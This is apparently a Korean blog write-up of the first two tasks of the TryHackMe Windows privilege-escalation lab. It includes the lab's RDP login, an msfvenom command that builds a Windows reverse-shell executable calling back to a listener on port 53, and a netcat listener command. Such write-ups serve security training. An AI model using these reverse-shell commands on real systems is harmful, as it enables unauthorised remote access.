TryHackMe | CTF

TryHackMe | Windows PrivEsC 모의해킹 Task1,Task2

건우Sec 2024. 9. 8. 15:14

 

TASK 1 Deploy the Vulnerable Windows VM

설명

현재 이 랩은 다양한 권한 상승을 소개하는데 중점을 두고있습니다 

Tib3rius 가 만들었고 Windows Privilege Escalation for OSCP and Beyond 중점을 둔 랩이라고 보시면 됩니다

 

RDP는 포트 3389에서 사용 가능해야 합니다 (서비스가 시작되기까지 몇 분이 걸릴 수 있습니다). "user" 계정으로 로그인하려면 비밀번호는 "password321"입니다

 

xfreerdp /u:user /p:password321 /cert:ignore /v:[IP]

위와같이 들어가시면 됩니다

 

TASK 2  Generate a Reverse Shell Executable

설명 

 

오케이 좋습니다 이제 msfvenom 모듈을 이용하여 LHOST IP 는 tryhackme 가상머신 IP 를 이용하세요

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe

 

 

msfvenom 의해 생성된 악성 exe reverse.exe 가 생성되였습니다

 

sudo nc -nlvp 53

 

먼저 nc 로 53 포트를 리스너 해주자

 

reverse.exe 파일을 Windows의 C:\PrivEsc 디렉토리로 전송해야 합니다. 이 작업을 수행하는 방법에는 여러 가지가 있지만, 가장 간단한 방법은 Kali에서 reverse.exe 파일이 있는 디렉토리에서 SMB 서버를 시작한 다음, Windows에서 표준 복사 명령을 사용하여 파일을 전송하는 것입니다.

 

현재 smb 서버를 시작한다음 파일을 전송해야 되는데...

( 온갖 방법을 시도했지만 실패했다 )

( 그래서 트라이핵미도 재부팅 해보고 온갖 시도를 해봤지만..)

 

 

나는 악성 파일을 피해자 윈도우로 옯겼다

 

그러므로 쉘을 얻었다

 

성공

TASK 3 Service Exploits - Insecure Service Permissions

다음 시간에...